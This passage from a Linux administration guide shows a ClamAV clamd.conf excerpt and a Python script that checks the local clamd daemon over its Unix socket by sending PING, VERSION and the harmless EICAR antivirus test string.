A database of virus signatures is installed in /var/lib/clamav/db; it is
an old version and will be updated as soon as the freshclam daemon is running.

Configuration of Clamav


The configuration file of the clamd daemon is /etc/clamd.conf. The
settings I use are (only the most important are shown):


# Example
LogFile /var/lib/clamav/log/clamd.log
#LogFileUnlock
LogTime
LogSyslog
#PidFile

TemporaryDirectory /var/lib/clamav/tmp
DatabaseDirectory /var/lib/clamav/db
LocalSocket /var/lib/clamav/run/clamd.sock
FixStaleSocket
#TCPSocket

User clamav

ScanPE
ScanOLE2
ScanMail
ScanHTML
#ScanArchive
ScanRAR
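A quick functional check for the clamd setup above. This is an added example, not part of ClamAV: it talks to the daemon over the LocalSocket configured above using clamd's own line protocol (NUL-terminated, z-prefixed commands; INSTREAM sends the data as big-endian length-prefixed chunks ending with a zero-length chunk) and streams the EICAR test string, which every ClamAV database detects. The socket path is the one from clamd.conf above; the helper names are mine. Because the run directory is mode 700, run this as the clamav user.

```python
import socket
import struct

CLAMD_SOCKET = "/var/lib/clamav/run/clamd.sock"  # LocalSocket from the clamd.conf above
# Standard EICAR test string (68 bytes); harmless, detected by every AV including ClamAV.
EICAR = b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"


def frame_instream(data: bytes, chunk: int = 4096) -> bytes:
    """zINSTREAM framing: command, then <4-byte BE length><bytes> chunks, then a zero-length chunk."""
    out = bytearray(b"zINSTREAM\x00")
    for i in range(0, len(data), chunk):
        part = data[i:i + chunk]
        out += struct.pack(">I", len(part)) + part
    out += struct.pack(">I", 0)
    return bytes(out)


def parse_reply(raw: bytes) -> tuple:
    """'stream: OK' -> ('OK', None); 'stream: Eicar-Test-Signature FOUND' -> ('FOUND', 'Eicar-Test-Signature')."""
    text = raw.rstrip(b"\x00\n").decode(errors="replace")
    head, sep, tail = text.partition(": ")
    verdict = tail if sep else head  # PING answers a bare 'PONG' with no 'stream: ' prefix
    if verdict.endswith(" FOUND"):
        return "FOUND", verdict[:-len(" FOUND")]
    if verdict.endswith(" ERROR"):
        return "ERROR", verdict[:-len(" ERROR")]
    return verdict, None


def clamd_exchange(payload: bytes, sock_path: str = CLAMD_SOCKET) -> bytes:
    """Send one z-prefixed command over the Unix socket and read until the NUL terminator."""
    with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
        s.settimeout(30)
        s.connect(sock_path)
        s.sendall(payload)
        buf = b""
        while not buf.endswith(b"\x00"):
            part = s.recv(4096)
            if not part:
                break
            buf += part
    return buf


def check_clamd(sock_path: str = CLAMD_SOCKET) -> dict:
    """PING, VERSION, then stream EICAR; a healthy daemon answers PONG and FOUND."""
    ping = parse_reply(clamd_exchange(b"zPING\x00", sock_path))[0]
    version = clamd_exchange(b"zVERSION\x00", sock_path).rstrip(b"\x00\n").decode(errors="replace")
    status, sig = parse_reply(clamd_exchange(frame_instream(EICAR), sock_path))
    return {"ping": ping, "version": version, "eicar": status, "signature": sig}


if __name__ == "__main__":
    result = check_clamd()
    print(result)
    if result["ping"] != "PONG" or result["eicar"] != "FOUND":
        raise SystemExit("clamd is not answering or does not detect EICAR: check socket, User and database")
```

If PING works but EICAR is not FOUND, the database in /var/lib/clamav/db has not been loaded; check that freshclam has run and that DatabaseDirectory matches.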